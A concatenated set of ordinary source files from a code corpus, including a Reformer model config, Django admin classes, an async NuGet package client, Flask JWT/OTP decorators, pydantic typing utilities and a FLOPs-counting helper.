local_num_chunks_before (:obj:`int`, `optional`, defaults to 1):
Number of previous neighbouring chunks to attend to in :obj:`LocalSelfAttention` layer to itself.
local_num_chunks_after (:obj:`int`, `optional`, defaults to 0):
Number of following neighbouring chunks to attend to in :obj:`LocalSelfAttention` layer in addition to
itself.
        local_attention_probs_dropout_prob (:obj:`float`, `optional`, defaults to 0.05):
The dropout ratio for the attention probabilities in :obj:`LocalSelfAttention`.
lsh_attn_chunk_length (:obj:`int`, `optional`, defaults to 64):
Length of chunk which attends to itself in :obj:`LSHSelfAttention`. Chunking reduces memory complexity from
sequence length x sequence length (self attention) to chunk length x chunk length x sequence length / chunk
length (chunked self attention).
lsh_num_chunks_before (:obj:`int`, `optional`, defaults to 1):
Number of previous neighbouring chunks to attend to in :obj:`LSHSelfAttention` layer to itself.
lsh_num_chunks_after (:obj:`int`, `optional`, defaults to 0):
Number of following neighbouring chunks to attend to in :obj:`LSHSelfAttention` layer to itself.
        lsh_attention_probs_dropout_prob (:obj:`float`, `optional`, defaults to 0.0):
The dropout ratio for the attention probabilities in :obj:`LSHSelfAttention`.
max_position_embeddings (:obj:`int`, `optional`, defaults to 4096):
The maximum sequence length that this model might ever be used with. Typically set this to something large
just in case (e.g., 512 or 1024 or 2048).
num_attention_heads (:obj:`int`, `optional`, defaults to 12):
Number of attention heads for each attention layer in the Transformer encoder.
num_buckets (:obj:`int` or :obj:`List[int]`, `optional`):
Number of buckets, the key query vectors can be "hashed into" using the locality sensitive hashing scheme.
Each query key vector is hashed into a hash in :obj:`1, ..., num_buckets`. The number of buckets can also
be factorized into a list for improved memory complexity. In this case, each query key vector is hashed
into a hash in :obj:`1-1, 1-2, ..., num_buckets[0]-1, ..., num_buckets[0]-num_buckets[1]` if
:obj:`num_buckets` is factorized into two factors. The number of buckets (or the product the factors)
should approximately equal sequence length / lsh_chunk_length. If :obj:`num_buckets` not set, a good value
is calculated on the fly.
num_hashes (:obj:`int`, `optional`, defaults to 1):
Number of hashing rounds (e.g., number of random rotations) in Local Sensitive Hashing scheme. The higher
:obj:`num_hashes`, the more accurate the :obj:`LSHSelfAttention` becomes, but also the more memory and time
intensive the hashing becomes.
pad_token_id (:obj:`int`, `optional`, defaults to 0):
The token id for the padding token.
        vocab_size (:obj:`int`, `optional`, defaults to 320):
            Vocabulary size of the Reformer model. Defines the number of different tokens that can be represented by the
:obj:`inputs_ids` passed when calling :class:`~transformers.ReformerModel`.
tie_word_embeddings (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether to tie input and output embeddings.
use_cache (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not the model should return the last key/values attentions (not used by all models).
Examples::
>>> from transformers import ReformerModel, ReformerConfig
>>> # Initializing a Reformer configuration
>>> configuration = ReformerConfig()
>>> # Initializing a Reformer model
>>> model = ReformerModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
"""
model_type = "reformer"
keys_to_ignore_at_inference = ["past_buckets_states"]
def __init__(
self,
attention_head_size=64,
attn_layers=["local", "lsh", "local", "lsh", "local", "lsh"],
axial_norm_std=1.0,
axial_pos_embds=True,
axial_pos_shape=[64, 64],
axial_pos_embds_dim=[64, 192],
chunk_size_lm_head=0,
eos_token_id=2,
feed_forward_size=512,
hash_seed=None,
hidden_act="relu",
hidden_dropout_prob=0.05,
hidden_size=256,
initializer_range=0.02,
is_decoder=False,
layer_norm_eps=1e-12,
local_num_chunks_before=1,
local_num_chunks_after=0,
local_attention_probs_dropout_prob=0.05,
local_attn_chunk_length=64,
lsh_attn_chunk_length=64,
lsh_attention_probs_dropout_prob=0.0,
lsh_num_chunks_before=1,
lsh_num_chunks_after=0,
max_position_embeddings=4096,
num_attention_heads=12,
num_buckets=None,
num_hashes=1,
pad_token_id=0,
vocab_size=320,
tie_word_embeddings=False,
use_cache=True,
**kwargs
):
super().__init__(
pad_token_id=pad_token_id,
eos_token_id=eos_token_id,
is_decoder=is_decoder,
tie_word_embeddings=tie_word_embeddings,
**kwargs,
)
self.hash_seed = hash_seed
self.vocab_size = vocab_size
self.attention_head_size = attention_head_size
self.hidden_size = hidden_size
self.num_attention_heads = num_attention_heads
self.num_hashes = num_hashes
self.num_hidden_layers = len(attn_layers)
self.num_buckets = tuple(num_buckets) if isinstance(num_buckets, list) else num_buckets
self.lsh_attn_chunk_length = lsh_attn_chunk_length
self.local_attn_chunk_length = local_attn_chunk_length
self.lsh_num_chunks_after = lsh_num_chunks_after
self.lsh_num_chunks_before = lsh_num_chunks_before
self.local_num_chunks_after = local_num_chunks_after
self.local_num_chunks_before = local_num_chunks_before
self.hidden_act = hidden_act
self.feed_forward_size = feed_forward_size
self.hidden_dropout_prob = hidden_dropout_prob
self.lsh_attention_probs_dropout_prob = lsh_attention_probs_dropout_prob
self.local_attention_probs_dropout_prob = local_attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.initializer_range = initializer_range
self.layer_norm_eps = layer_norm_eps
self.axial_pos_embds = axial_pos_embds
self.axial_pos_shape = tuple(axial_pos_shape)
self.axial_pos_embds_dim = tuple(axial_pos_embds_dim)
self.axial_norm_std = axial_norm_std
self.chunk_size_lm_head = chunk_size_lm_head
self.attn_layers = attn_layers
self.use_cache = use_cache
|
the-stack_0_6192 | from django.contrib import admin
from django.db.models import Count
from django.template.defaultfilters import truncatechars
from django.utils.translation import gettext_lazy as _
from guardian.admin import GuardedModelAdmin
from rest_framework_api_key.admin import APIKeyModelAdmin
from rest_framework_api_key.models import APIKey
from .models import Service, ServiceAPIKey, ServiceClientId
@admin.register(ServiceClientId)
class ServiceClientIdAdmin(admin.ModelAdmin):
list_display = ("get_service_name", "client_id")
search_fields = ("service__name", "client_id")
autocomplete_fields = ("service",)
@admin.display(description=_("service"), ordering="-service__name")
def get_service_name(self, obj):
return obj.service.name
class ServiceClientIdInline(admin.StackedInline):
model = ServiceClientId
extra = 0
@admin.register(Service)
class ServiceAdmin(GuardedModelAdmin):
list_display = ("name", "short_description", "api_key_count")
search_fields = ("name",)
inlines = (ServiceClientIdInline,)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.annotate(api_keys_count=Count("api_keys"))
@admin.display(description=_("description"))
def short_description(self, obj: Service):
return truncatechars(obj.description, 255)
@admin.display(description=_("api keys"), ordering="api_keys_count")
def api_key_count(self, obj):
return obj.api_keys_count
@admin.register(ServiceAPIKey)
class ServiceAPIKeyModelAdmin(APIKeyModelAdmin):
list_display = (*APIKeyModelAdmin.list_display, "get_service_name")
search_fields = (*APIKeyModelAdmin.search_fields, "service__name")
autocomplete_fields = ("service",)
list_select_related = ("service",)
@admin.display(description=_("service"), ordering="-service__name")
def get_service_name(self, obj):
return obj.service.name
admin.site.unregister(APIKey)
|
the-stack_0_6195 | import datetime
import functools
import logging
from enum import Enum
from typing import AsyncGenerator, List, Union
from ..smart_client import SmartClient
import nuget_package_scanner.nuget
import nuget_package_scanner.nuget.date_util as date_util
import nuget_package_scanner.nuget.version_util as version_util
from .nuget_server import NugetServer
from .nuget_config import Package
from .registrations import RegistrationsIndex
from .version_util import VersionPart
class Nuget:
"""
Nuget client that can be used to retrieve package registration info from multiple Nuget Servers.
"""
async def __aenter__(self):
await self.initialize_clients()
return self
async def __aexit__(self, exc_type, exc_value, traceback):
return
def __init__(self, client: SmartClient, configs: dict = {}):
"""
Initializes the client.
param: configs Additional Nuget servers to search if a package is not found on nuget.org.\n
            key: Nuget server index url
value: Name
"""
self._configs = configs
self._clients_cache: List[NugetServer] = []
self._package_cache = {}
self._client = client
async def initialize_clients(self):
await self.__get_clients()
async def __get_clients(self):
if self._clients_cache:
return self._clients_cache
self._clients_cache.append(await NugetServer.create(self._client)) # ensuring that nuget.org is added first
for c in self._configs:
self._clients_cache.append(await NugetServer.create(self._client,c))
return self._clients_cache
async def get_fetch_package_details(self, package: Package):
"""
        Attempts to get the package from cache, then falls back to a nuget server query if not found.
If a server query is attempted, this fetches nuget package details from the first :class nuget.RegistrationsIndex found
for :param package. The strategy is to first search for package registrations at nuget.org and then
to cycle through any :param configs that have been provided.
"""
assert isinstance(package, Package)
nuget_server: NugetServer = await self.__fetch_server_for_id(package.name)
# Note: If you're wondering where caching is at, it's on in the client
if nuget_server:
registrations_index = await nuget_server.registrations.index(package.name) # will already be cached
package.source = registrations_index.url
await self.__fetch_and_populate_version(registrations_index, package)
await self.__fetch_and_populate_latest_release(registrations_index, package)
await self.__fetch_and_populate_latest_version(registrations_index, package)
package.available_version_count = self.__get_available_package_count(registrations_index)
if package.version and package.latest_release:
version_diff = version_util.get_version_count_behind(package.version, package.latest_release)
package.major_releases_behind = version_diff[VersionPart.MAJOR]
package.minor_releases_behind = version_diff[VersionPart.MINOR]
package.patch_releases_behind = version_diff[VersionPart.PATCH]
package.set_details_url(nuget_server.package_uri_template)
else:
            logging.warning(f'Could not find {package.name} in any of the configured nuget servers.')
async def __fetch_server_for_id(self, id: str) -> NugetServer:
"""
Returns the first :type nuget.NugetServer that houses the provided :param id.
The strategy is to first search for package registrations at nuget.org and then
to cycle through any :param configs that have been provided.
:param configs: A :class:dict that contains non-nuget.org server implementations to query
:param id: A :class:dict that contains non-nuget.org server implementations to query
"""
## TODO: Allow for preferred ordering in some cases? You may have a convention or some other means that allows you to know exactly which server to query.
for c in await self.__get_clients():
index = await c.registrations.index(id)
if index:
return c
# TODO: Potentially optimize these
async def __fetch_and_populate_version(self, registrationsIndex: RegistrationsIndex, package: Package):
if registrationsIndex and package.version:
for page in registrationsIndex.items:
if not version_util.is_newer_release(page.upper, package.version):
for leaf in await page.items():
if leaf.catalogEntry.version == package.version and leaf.commitTimeStamp:
package.version_date = date_util.get_date_from_iso_string(leaf.commitTimeStamp).strftime('%Y-%m-%d')
return
async def __fetch_and_populate_latest_version(self, registrationsIndex: RegistrationsIndex, package: Package):
        # latest version metadata
        if registrationsIndex:
            # assuming the newest is always at the end of the list
for page in reversed(registrationsIndex.items):
for leaf in reversed(await page.items()):
package.latest_version = leaf.catalogEntry.version
if leaf.commitTimeStamp:
package.latest_version_date = date_util.get_date_from_iso_string(leaf.commitTimeStamp).strftime('%Y-%m-%d')
return
async def __fetch_and_populate_latest_release(self, registrationsIndex: RegistrationsIndex, package: Package):
        # latest release metadata
        if registrationsIndex:
            # assuming the newest is always at the end of the list
for page in reversed(registrationsIndex.items):
for leaf in reversed(await page.items()):
if version_util.is_full_release(leaf.catalogEntry.version):
package.latest_release = leaf.catalogEntry.version
if leaf.commitTimeStamp:
package.latest_release_date = date_util.get_date_from_iso_string(leaf.commitTimeStamp).strftime('%Y-%m-%d')
return
def __get_available_package_count(self, registrationsIndex: RegistrationsIndex) -> int:
count = 0
if registrationsIndex:
for page in registrationsIndex.items:
count += page.count
return count
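# Hedged usage sketch (not part of the original module): the intended call pattern
# for this client. How the SmartClient and the Package (with at least `name`, and
# optionally `version`, set) are constructed is defined elsewhere and left out here.
async def _example_lookup(client: SmartClient, package: Package) -> None:
    async with Nuget(client) as nuget:  # initialize_clients() runs in __aenter__
        await nuget.get_fetch_package_details(package)
        # afterwards, fields such as package.latest_release and
        # package.major_releases_behind are populated when the package is found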
|
the-stack_0_6201 |
"""contains custom scrapy pipeline."""
class IndexPipeline(object):
"""This class renames _index field."""
def process_item(self, item, spider):
"""implements https://doc.scrapy.org/en/latest/topics/item-pipeline.html#process_item"""
if item.get('_index'):
item['self'] = item.pop('_index')
return item
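# Hedged usage note (not part of the original file): a pipeline like this is enabled
# from the Scrapy project's settings.py. The dotted module path and the priority value
# below are assumptions about the surrounding project layout.
#
# ITEM_PIPELINES = {
#     "myproject.pipelines.IndexPipeline": 300,
# }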
|
the-stack_0_6202 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from functools import wraps
from werkzeug.exceptions import Forbidden
from .models import *
# from flask_jwt_extended.view_decorators import _decode_jwt_from_request
from flask_jwt_extended import verify_jwt_in_request, get_jwt_claims
from lgw import lxd_api_get
def import_user():
"""
Get user identity from json web token
:return: current_identity
"""
try:
from flask_jwt_extended import get_jwt_identity
current_identity = User.query.get(int(get_jwt_identity()))
return current_identity
except ImportError:
raise ImportError(
'User argument not passed')
def populate_instances_table():
"""
Search for new or deleted instances and update their status in local database
"""
database_lxdservers_list = Server.query.all()
for lxdserver in database_lxdservers_list:
all = []
try:
res = lxd_api_get(lxdserver, 'instances')
for c in res.json()['metadata']:
all.append(c[15:]) # get instance name from api url
except Exception as e:
print(e)
current_instances_list = tuple(all)
database_instances_list = Instance.query.filter_by(location=lxdserver.name)
database_instances_list_names = [str(i.name) for i in database_instances_list]
# Removing old instances from database
for inst in database_instances_list:
if not inst.name in current_instances_list:
db.session.delete(inst)
db.session.commit()
if len(inst.servers) == 0:
db.session.delete(inst)
db.session.commit()
# Adding new instances to database
for cinst in current_instances_list:
if not cinst in database_instances_list_names:
instance = Instance()
instance.name = cinst
instance.location = lxdserver.name
db.session.add(instance)
db.session.commit()
lxdserver.instances.append(instance.id)
db.session.commit()
db.session.commit()
def user_has(ability, get_user=import_user):
"""
Takes an ability (a string name of either a role or an ability) and returns the function if the user has that ability
:param ability:
:param get_user:
:return: wrapper:
"""
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
desired_ability = Ability.query.filter_by(
name=ability).first()
user_abilities = []
current_identity = get_user()
for group in current_identity._groups:
user_abilities += group.abilities
if current_identity.admin or desired_ability.id in user_abilities:
return func(*args, **kwargs)
else:
raise Forbidden("You do not have access")
return inner
return wrapper
def otp_confirmed(fn):
"""
    If you decorate a view with this, it will ensure that the requester has a
    valid JWT before calling the actual view. It also checks that OTP is confirmed.
:param fn: The view function to decorate
"""
@wraps(fn)
def wrapper(*args, **kwargs):
# jwt_data = _decode_jwt_from_request(request_type='access')
# print(jwt_data)
verify_jwt_in_request()
claims = get_jwt_claims()
if claims['otp_confirmed'] == False:
raise Forbidden("You do not have access")
else:
return fn(*args, **kwargs)
return wrapper
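# Hedged usage sketch (not part of the original module): how the two decorators above
# are typically stacked on a Flask view. The route, the `app` object passed in and the
# 'instances_infos' ability name are illustrative assumptions only.
def _example_register_protected_view(app):
    @app.route('/api/instances')
    @otp_confirmed
    @user_has('instances_infos')
    def list_instances():
        populate_instances_table()
        return {"instances": [i.name for i in Instance.query.all()]}
    return list_instances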
|
the-stack_0_6203 | from S3utility.s3_notification_info import S3NotificationInfo
from provider.execution_context import get_session
from provider.article_structure import ArticleInfo
import provider.lax_provider
from activity.objects import Activity
lookup_functions = {
"article_next_version": provider.lax_provider.article_next_version,
"article_highest_version": provider.lax_provider.article_highest_version,
}
class activity_VersionLookup(Activity):
def __init__(self, settings, logger, conn=None, token=None, activity_task=None):
super(activity_VersionLookup, self).__init__(
settings, logger, conn, token, activity_task
)
self.name = "VersionLookup"
self.pretty_name = "Version Lookup"
self.version = "1"
self.default_task_heartbeat_timeout = 30
self.default_task_schedule_to_close_timeout = 60 * 5
self.default_task_schedule_to_start_timeout = 30
self.default_task_start_to_close_timeout = 60 * 5
self.description = (
"Looks up version on Lax endpoints and stores version in session"
)
self.logger = logger
def do_activity(self, data=None):
try:
info = S3NotificationInfo.from_dict(data)
filename = info.file_name[info.file_name.rfind("/") + 1 :]
run = data["run"]
session = get_session(self.settings, data, run)
session.store_value("filename_last_element", filename)
session.store_value("run_type", data.get("run_type"))
article_structure = ArticleInfo(filename)
if article_structure.article_id is None:
self.logger.error(
"Name '%s' did not match expected pattern for article id" % filename
)
raise RuntimeError(
"article_structure.article_id is None. File pattern problem."
)
version = self.get_version(
self.settings, article_structure, data["version_lookup_function"]
)
session.store_value("version", version)
article_id = str(int(article_structure.article_id))
session.store_value("article_id", article_id)
self.emit_monitor_event(
self.settings,
article_id,
version,
data["run"],
self.pretty_name,
"start",
" ".join(
("Version Lookup for article", article_id, "version:", version)
),
)
self.set_monitor_property(
self.settings, article_id, "article-id", article_id, "text"
)
self.set_monitor_property(
self.settings,
article_id,
"publication-status",
"publication in progress",
"text",
version=version,
)
self.emit_monitor_event(
self.settings,
article_structure.article_id,
version,
data["run"],
self.pretty_name,
"end",
" ".join(
(
"Finished Version Lookup for article",
article_structure.article_id,
"version:",
version,
)
),
)
return self.ACTIVITY_SUCCESS
except Exception as exception:
self.logger.exception(
"Exception when trying to Lookup Version. Error: " + str(exception)
)
return self.ACTIVITY_PERMANENT_FAILURE
def get_version(self, settings, article_structure, lookup_function):
try:
version = article_structure.get_version_from_zip_filename()
if version is None:
return str(
execute_function(
lookup_functions[lookup_function],
article_structure.article_id,
settings,
)
)
return version
except Exception:
self.logger.exception("Exception on function `get_version`")
raise
def execute_function(the_function, arg1, arg2):
return the_function(arg1, arg2)
|
the-stack_0_6204 | """
Custom typing extension.
Classes:
ConstantHolder: Base class for storing constants and avoiding to hardcode everything.
SaveableBaseModel: Child class of pydantic.BaseModel which enables saving and loading that BaseModel.
    TypedNamedTuple: Child class of pydantic.BaseModel, can be used similarly to a NamedTuple and has some
tensor handling utilities.
ConfigClass: Base class for storing configuration fields that appear in the configuration YAML files.
"""
from __future__ import annotations
import inspect
import json
from collections.abc import Iterable, Mapping
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union, cast
import numpy as np
import torch as th
from pydantic import BaseModel
INF = 32752 # infinity expressed in float16, this is large enough s.t. exp(-INF) == 0
TENSOR_TYPES = (th.Tensor, np.ndarray)
class ConfigClass:
"""
Base class for config storage classes. Defines representation for printing.
"""
def __repr__(self) -> str:
"""
Represent class attributes as key, value pairs.
Returns:
String representation of the config.
"""
str_repr = ["", "-" * 10 + " " + type(self).__name__]
for key, value in vars(self).items():
if key in ["config_orig"]:
continue
if isinstance(value, ConfigClass):
# str_repr += ["-" * 10 + " " + key, str(value)]
str_repr += [str(value)]
else:
str_repr += [f" {key} = {value}"]
return "\n".join(str_repr)
# ---------- SaveableBaseModel: Class for modeling and storing states. ----------
class SaveableBaseModel(BaseModel):
"""
Saveable version of pydantic BaseModel class.
"""
def save(self, file: Union[str, Path]) -> None:
"""
Save the model.
Args:
file: Target json file.
"""
try:
json.dump(self.dict(), Path(file).open("wt", encoding="utf8"))
except TypeError as e:
# something in the object is probably not JSON serializable.
print("---------- JSON encoding error! ----------")
for key, val in self.dict().items():
print(f"{key}: {type(val)}")
raise TypeError(f"See console output. JSON save to {file} failed.") from e
def load(self, file: Union[str, Path]) -> SaveableBaseModel:
"""
Load model values from file.
Args:
file: Source json file.
Returns:
Class instance with values set from the file.
"""
for key, val in json.load(Path(file).open("rt", encoding="utf8")).items():
self.__setattr__(key, val)
return self
@classmethod
def create_from_file(cls, file: Union[str, Path]) -> SaveableBaseModel:
"""
Instantiate model from file.
Args:
file: Source json file.
Returns:
Class instance with values set from the file.
"""
return cls(**json.load(Path(file).open("rt", encoding="utf8")))
class Config:
# configure pydantic.BaseModel to fail on assigning wrongly typed values
validate_assignment = True
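# Hedged usage sketch (illustration only, not part of the original module): a minimal
# SaveableBaseModel subclass and its save/load round trip. The field names and the
# target file path are arbitrary.
class _ExampleTrainerState(SaveableBaseModel):
    epoch: int = 0
    best_score: float = 0.0
# state = _ExampleTrainerState(epoch=3, best_score=0.71)
# state.save("trainer_state.json")
# restored = _ExampleTrainerState.create_from_file("trainer_state.json")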
# ---------- TypedNamedTuple: Class for explicit data modeling. ----------
def _nested_shape_check(field_name: str, tensor_container: Any, shape: List[Optional[int]]) -> None:
"""
Check if input tensor matches the given shape. If input is iterable or mapping, recurse into it and check
if all contained tensors match the given shape.
Args:
field_name: Used to give a more verbose error.
tensor_container: Input tensor or container of tensors.
shape: Target shape to check.
Raises:
AssertionError (wrong shape), TypeError (wrong input type)
"""
if isinstance(tensor_container, TENSOR_TYPES):
value_shape = tensor_container.shape
err_msg = f"Shape mismatch, input {value_shape} defined {shape} on field {field_name}"
# check same number of dimensions
assert len(value_shape) == len(shape), err_msg
# check each dimension
for s1, s2 in zip(value_shape, shape):
# either target shape is arbitrary (None) or it matches input shape
assert s2 is None or s1 == s2, err_msg
elif isinstance(tensor_container, Iterable):
for tensor_subcontainer in tensor_container:
_nested_shape_check(field_name, tensor_subcontainer, shape)
elif isinstance(tensor_container, Mapping):
for _, tensor_subcontainer in tensor_container.items():
_nested_shape_check(field_name, tensor_subcontainer, shape)
else:
raise TypeError(f"Tensor shape check on class {type(tensor_container)} not supported, field {field_name}.")
class TypedNamedTuple(BaseModel):
"""
Behaves similar to NamedTuple. Includes type and shape validation.
Notes:
Implementation of pydantic BaseModel that can be instantiated with args instead of kwargs
Define class field _shape_dict to check shapes.
Args:
*args: Values for the model with same order as defined.
Examples:
>>> class ExampleTuple(TypedNamedTuple):
>>> key: str
>>> data: th.Tensor
>>> # shape check: first dimension arbitrary, second must match exactly
>>> _shapes_dict = {"key": (None, 6)}
>>> t = ExampleTuple("key", th.zeros(4, 6))
>>> t.key # access with field attribute
>>> t.dict()["key"] # access like a dict
>>> t.tuple()[0] # access like a tuple
"""
_shapes_dict: Dict[str, List[Optional[int]]] = {}
def __init__(self, *args, **kwargs):
assert len(args) <= len(self.__fields__), (f"Too many ({len(args)}) arguments "
f"for class {self.__class__.__name__}")
if len(args) > 0:
# fill the kwargs dict with (name, value) entries from args
for (field, _model_field), arg in zip(self.__fields__.items(), args):
assert field not in kwargs, f"Duplicate argument '{field}' for class {self.__class__.__name__}."
kwargs[field] = arg
# instantiate the model with that dict
super().__init__(**kwargs)
self.validate_shapes()
def __len__(self) -> int:
"""
Convenience function: length of the tuple
Returns:
Length.
"""
return len(self.__fields__)
def tuple(self) -> Tuple[Any]:
"""
Access the model values as tuple.
Returns:
Model values as tuple.
"""
return tuple(self.dict().values())
def dict(self, **kwargs) -> Dict[str, Any]: # pylint: disable=useless-super-delegation
"""
Overwrite this function for proper type hints.
Returns:
Model fields and values as dict.
"""
return super().dict(**kwargs)
    def keys(self) -> List[str]:
        """
        Get the field names, analogous to dict.keys().
        Returns:
            Field names.
        """
        return self.dict().keys()
    def items(self) -> List[Tuple[str, Any]]:
        """
        Get the field name/value pairs, analogous to dict.items().
        Returns:
            Field name/value pairs.
        """
        return self.dict().items()
    def values(self) -> List[Any]:
        """
        Return the field values, analogous to dict.values().
        Returns:
            Field values.
        """
        return self.dict().values()
def validate_shapes(self):
"""
Use class field _shapes_dict to check if input tensors match the target shapes.
Returns:
"""
# loop all defined shapes
for key, shape in self._shapes_dict.items():
# get the field value with defined name
value = self.dict()[key]
# compare to target shape
_nested_shape_check(key, value, shape)
def to_cuda(self, *, non_blocking: bool = True) -> None:
"""
Convenience function: Move all tensors in the model to cuda.
Args:
non_blocking: Some PyTorch internal parameter, has something to do with pin_memory in dataloader.
Usually shouldn't hurt to keep it at True.
"""
# loop all tensors in the model
for name, value in self.dict().items():
if isinstance(value, th.Tensor):
# update pydantic BaseModel with setattr
setattr(self, name, value.cuda(non_blocking=non_blocking))
class Config:
# allow torch tensors etc.
arbitrary_types_allowed = True
# ---------- ConstantHolder: Container for constants ----------
class _StringRepr(type):
"""
Metaclass for overwriting result of str(Class).
"""
def __str__(cls) -> str:
"""
When calling str(Class), call Class._get_string_repr method.
Returns:
Custom class string representation.
"""
return cls._get_string_repr() # pylint: disable=no-value-for-parameter
def _get_string_repr(cls) -> str:
"""
Override this to return string representation of the class.
Returns:
Class representation as string.
"""
raise NotImplementedError
class ConstantHolder(metaclass=_StringRepr):
"""
    Class to hold constants. Attributes must be uppercase. Cannot be instantiated.
Notes:
There is some magic happening here:
The properties of this base class (_keys, _values, _dict) will hold all constants including those of inherited
classes. The interface will then dynamically return the correct things given the current cls.__name__.
Examples:
        Subclass ConstantHolder and set constants as uppercase class attributes.
        Set allowed_types to a single type or list of types for value checks.
        >>> class MyConstants(ConstantHolder, allowed_types=str):
        ...     FIELD = "value"
Methods:
keys: Get list of constant keys.
values: Get list of constant values.
items: Get list of constant key/value tuples.
dict: Get dictionary of constant key/value pairs.
get: Get value given key, error if not found.
get_safe: Get value given key, return default if not found.
check_has_key: Returns bool whether or not the key is in the class.
assert_has_key: Raise error if the key is not found.
check_has_value: Returns bool whether or not the value is in the class.
assert_has_value: Raise error if the value is not found.
Notes:
        Public interface: Methods keys, values, items, dict, get, get_safe and the check_/assert_ helpers.
This class is introduced because enum.Enum has lots of unnecessary restrictions and is clumsy to use.
Public methods resemble those of a dict but return lists, not e.g. instances of dict_keys.
"""
# create the class properties with empty entries for the root parent
_keys: Dict[str, List[str]] = {"ConstantHolder": []}
_values: Dict[str, List[Any]] = {"ConstantHolder": []}
_dict: Dict[str, Dict[str, Any]] = {"ConstantHolder": {}}
# ---------- Public interface ----------
@classmethod
def keys(cls) -> List[str]:
"""
Get list of constant keys.
Returns:
Constant keys.
"""
return cls._keys[cls.__name__]
@classmethod
def values(cls) -> List[Any]:
"""
Return constant values.
Returns:
Constant values.
"""
return cls._values[cls.__name__]
@classmethod
def dict(cls) -> Dict[str, Any]:
"""
Return constant key-value pairs as dict.
Returns:
Constant keys.
"""
return cls._dict[cls.__name__]
@classmethod
def items(cls) -> List[Tuple[str, Any]]:
"""
Return constant key-value pairs as list of tuples like dict items.
Returns:
Constant keys.
"""
return list(zip(cls._keys[cls.__name__], cls._values[cls.__name__]))
@classmethod
def get(cls, key: str) -> Any:
"""
Get constant value given the key. Raise error if not found.
Args:
key: Constant key.
Returns:
Constant value.
"""
if key not in cls.keys():
raise IndexError(f"No key: {key} in {cls}")
return cast(Any, getattr(cls, key))
@classmethod
def get_safe(cls, key: str, default: Optional[Any] = None) -> Optional[Any]:
"""
Get constant value given the key. Return default if not found.
Args:
key: Constant key.
default: Value to return if key is not found, default None.
Returns:
Constant value or default.
"""
if key not in cls.keys():
return default
return cls.get(key)
@classmethod
def check_has_key(cls, key: str) -> bool:
"""
Check if the key is in the class.
Args:
key: Constant key.
Returns:
Whether or not the key is defined in the class.
"""
return key in cls.keys()
@classmethod
def assert_has_key(cls, key: str) -> None:
"""
Throw error if the key is not found in the class.
Args:
key: Constant key.
"""
assert cls.check_has_key(key), f"Key not found: {key} in {cls}"
@classmethod
def check_has_value(cls, value: Any) -> bool:
"""
Check if the value is in the class.
Args:
value: Constant value.
Returns:
Whether or not the key is defined in the class.
"""
return value in cls.values()
@classmethod
def assert_has_value(cls, value: str) -> None:
"""
Throw error if the value is not found in the class.
Args:
value: Constant value.
"""
assert cls.check_has_value(value), f"Value not found: {value} in {cls}"
# ---------- Private setup methods ----------
@classmethod
def _get_string_repr(cls) -> str:
"""
Return class name and content as string for better error messages.
Returns:
String representation.
"""
return f"ConstantHolder {cls.__name__}: {cls.items()}"
@classmethod
def __init_subclass__(cls, allowed_types: Optional[Union[type, List[type], Tuple[type, ...]]] = None) -> None:
"""
Setup properties for the public interface when this class is inherited.
This will be called on nested inheritance as well.
Args:
allowed_types: Optionally specify a type or list of types that are allowed for values.
By default all values are allowed.
"""
cls._keys[cls.__name__] = []
cls._values[cls.__name__] = []
cls._dict[cls.__name__] = {}
# add parent fields
for parent_cls in cls.__bases__:
cls._keys[cls.__name__] += cls._keys[parent_cls.__name__]
cls._values[cls.__name__] += cls._values[parent_cls.__name__]
cls._dict[cls.__name__].update(cls._dict[parent_cls.__name__])
# loop attributes, check correctness and extend the parent's class properties _keys, _values, _dict.
for key in cls.__dict__:
# ignore non-public fields
if key[0] == "_":
continue
# get the value of the constant
value = getattr(cls, key)
# ignore classmethods
if inspect.ismethod(value) and value.__self__ is cls:
continue
# make sure all constants are uppercase
assert key == key.upper(), f"Constant: {key} in class: {cls.__name__} must be uppercase."
# if allowed types is specified, make sure the value types are allowed
if allowed_types is not None:
# isinstance errors when fed lists instead of tuple, so convert lists to tuples
if isinstance(allowed_types, list):
allowed_types = tuple(allowed_types)
assert isinstance(value, allowed_types), (
f"Constant: {key} in class: {cls.__name__} must be of type {allowed_types}")
# update class properties
cls._keys[cls.__name__].append(key)
cls._values[cls.__name__].append(value)
cls._dict[cls.__name__][key] = value
def __init__(self) -> None:
"""
        Raise error when trying to instantiate a ConstantHolder class.
"""
raise RuntimeError(f"Do not instance this class, it's a ConstantHolder: {type(self).__name__}")
|
the-stack_0_6205 | ################################################################################
# [VMLMF] Lowrank Matrix Factorization with Vector-Multiplication
# Project: Starlab
#
# Authors: Hyojin Jeon ([email protected]), Seoul National University
# U Kang ([email protected]), Seoul National University
#
# File: compression_cal.py
# - utilities for analyze compression results of VMLMF
#
# Version : 1.0
# Date : Oct 14, 2021
# Main Contact: Hyojin Jeon
#
# This software is free of charge under research purposes.
# For commercial purposes, please contact the authors.
#
################################################################################
# pylint: disable=C0103, E1101, C0114, R0902,C0116, R0914, R0913, C0123, W0613, W0102,C0413, E0401,R1719
"""
====================================
:mod:`compression_cal`
====================================
.. moduleauthor:: Hyojin Jeon <[email protected]>
Description
===========
Module for computing the number of parameters and FLOPs of a model.
"""
import sys
sys.path.append('../')
def print_model_parm_nums(model):
"""print the number of parameters of the model
:param model: model to count parameters
"""
modelparams=sum(p.numel() for p in model.parameters())
print(f" + Number of params:{(modelparams/1e3):.2f}K")
def print_model_parm_flops(model,seq_len,args,modeltype="vmmodel"):
"""print FLOPs of the model
:param model: model to count FLOPs
:param seq_len: integer sequence length of the input data
:param args: argument user decided
:param modeltype: string type of the model
"""
if modeltype in ['vmlmf_group','vmlmf_lm']:
print("Not Implemented")
return
batch_size=args.batch_size
modeltype=args.model.lower() if modeltype != "mylstm" else "mylstm"
total_ops=count_lstm(model,seq_len,batch_size,modeltype)
    total_ops+=count_linear(model,18) # linear layer in_features -> out_features (=18)
print(f" + Number of FLOPs: {(total_ops / 1e6):.2f}M")
print(total_ops)
def print_model_parm_names(model):
"""print the name of parameters of the model
:param model: model to get parameters
"""
for idx,m in enumerate(model.modules()):
print( idx, '->', m )
print("Model's state_dict:")
for param_tensor in model.state_dict():
print(param_tensor, "\t", model.state_dict()[param_tensor].size())
